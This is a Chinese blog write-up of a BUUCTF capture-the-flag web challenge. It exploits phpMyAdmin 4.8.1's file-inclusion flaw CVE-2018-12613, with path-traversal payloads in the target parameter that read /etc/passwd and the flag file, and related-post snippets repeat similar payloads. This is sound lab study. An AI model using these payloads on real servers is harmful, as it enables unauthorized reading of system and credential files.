BUUCTF [GWCTF 2019] 我有一个数据库

最新推荐文章于 2024-05-13 09:10:03 发布
最新推荐文章于 2024-05-13 09:10:03 发布
阅读量2.1k 收藏 6
点赞数 3
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF GWCTF 2019 我有一个数据库 writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/111026271
版权

BUUCTF [GWCTF 2019] 我有一个数据库

考点:

  1. 目录扫描
  2. phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

启动环境:
在这里插入图片描述
应该是为乱码,结合题目名,应该与数据库有关,寻找提示无果,使用dirsearch扫描后台:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
扫描到如上页面,查看robots.txt
在这里插入图片描述
查看phpinfo页面:
在这里插入图片描述
dirsearch还扫描到存在phpmyadmin数据库管理页面,尝试访问:

http://xxx/phpmyadmin/index.php

成功访问到:
在这里插入图片描述
查看到其phpMyAdmin信息:
在这里插入图片描述
查询到4.8.1版本存在任意文件读取漏洞:phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

漏洞复现:phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613

使用Payload尝试:

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

在这里插入图片描述
可以成功执行,获取到了passwd文件的内容,尝试查找flag,最终Payload

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

得到flag:
在这里插入图片描述

Senimo_
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF WEB [GWCTF 2019]我有一个数据库
Y1da的博客
04-27 371
BUUCTF WEB [GWCTF 2019]我有一个数据库 刷新后查看响应包 <!DOCTYPE html> <html> <head> <title>空的数据库</title> </head> <body> <h1>我有一个数据库,但里面什么也没有~</h1> <h1>不信你找</h1> </body> </html> 没有什么其他
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
记录学习,一起进步
01-29 272
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
[网络安全 CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客大挑战 2019]php(1)
最新发布
2401_84971097的博客
05-13 402
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[GWCTF 2019]我有一个数据库
wikey 的博客
03-30 214
看到这个phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置。直接就是乱码,联想到题目的数据库,那问题就i一定出现在数据库里,可以用两个扫描工具扫描试试。
[GWCTF 2019]我有一个数据库1--writeup
m0_65080524的博客
08-14 78
这里这么多../ 其实目的是为了回退到根目录,然后访问flag 至于为什么知道flag在根目录,我也不太清楚,反正ctf就是要积极尝试,总而言之就是经验告诉我,flag就在这。,于是 扫到了phpmyadmin/以及phpinfo.php 打开phpinfo看完并没有什么发现于是打开phpmyadmin。可以注意到 phpMyAdmin版本号是4.8.1 而恰好这个版本存在着一个文件包含漏洞(题目打开是这样的,毫无提示于是还是按照正常的流程 先。
BUU[GWCTF 2019]我有一个数据库
qq_62078839的博客
04-26 1823
打开链接 一堆乱码,查看源代码也没什么信息可提取,利用目录扫描器,看能不能扫出什么东西 扫到了一个phpmyadmin 进去看看 这里的版本号为4.8.1,而phpmyadmin在4.8.0以及4.8.1的版本号中有文件包含漏洞 [PHPMYADMIN]CVE-2018-12613 我们试试读取看是否成功 index.php?target=sql.php?/../../../../../../../../../etc/passwd 成功 尝试读取flag inde...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜...得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
这个案例展示了如何利用变量覆盖漏洞来获取隐藏的信息,并强调了在编写PHP代码时,正确处理用户输入和防止变量覆盖的重要性。在进行代码审计时,务必关注这些潜在的风险点,以提高应用程序的安全性。
[GWCTF 2019] web题-我有一个数据库
BROTHERYY的博客
07-30 1766
复现环境:buuoj.cn 我是从题目猜到有phpmyadmin,直接就输入就进去了 看一下版本信息 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 能够执行,修改为flag flag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6} ...
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 553
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
[GWCTF 2019]我有一个数据库(文件包含漏洞)
weixin_44110537的博客
10-03 407
一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现 有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含 这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.
DDCTF 2019 writeup Wireshark
Barzar的博客
04-20 1611
DDCTF 2019 Wireshark写在最前分析数据包分析文件解码 写在最前 总的来说这是一道挺常规的Wireshark分析题,一般的wireshark题的信息总是隐藏在http的url,html或者图片里面,所以一般拿到Wireshark的题直接奔http就行啦 要是不在http我就不承认我说过这句话 Wireshark数据包下载地址 分析数据包 拿到数据包先搜索http 通过分析发现ht...
【pwn】SWPUCTF_2019_p1KkHeap
Nothing
12-10 681
libc-2.27.so下的一道tcache堆题。 例行检查 保护全开。 分析程序,在进入菜单之前,有一个函数跟入查看。 注意到这边用mmap函数在0x66660000映射了一块大小为0x1000的内存空间,权限是rwx。然后用prctl函数做了一个沙箱。我们查看以下禁用了什么调用。 可见execve被禁用,于是system函数和onegadget都不可行。于是就只能自己将shellcode(or...
[GWCTF2019]huyao
07-28
\[GWCTF2019\]huyao是一个CTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,它可能涉及到频域盲水印隐写。具体的解题方法和细节需要参赛者在比赛中进行分析和解决。 #### 引用[.reference_title] - *1* [BUUCTF MISC刷题笔记(三)](https://blog.csdn.net/weixin_45696568/article/details/116421340)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [BUUCTF misc 解题记录 二(超级详细)](https://blog.csdn.net/qq_51090016/article/details/115712647)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值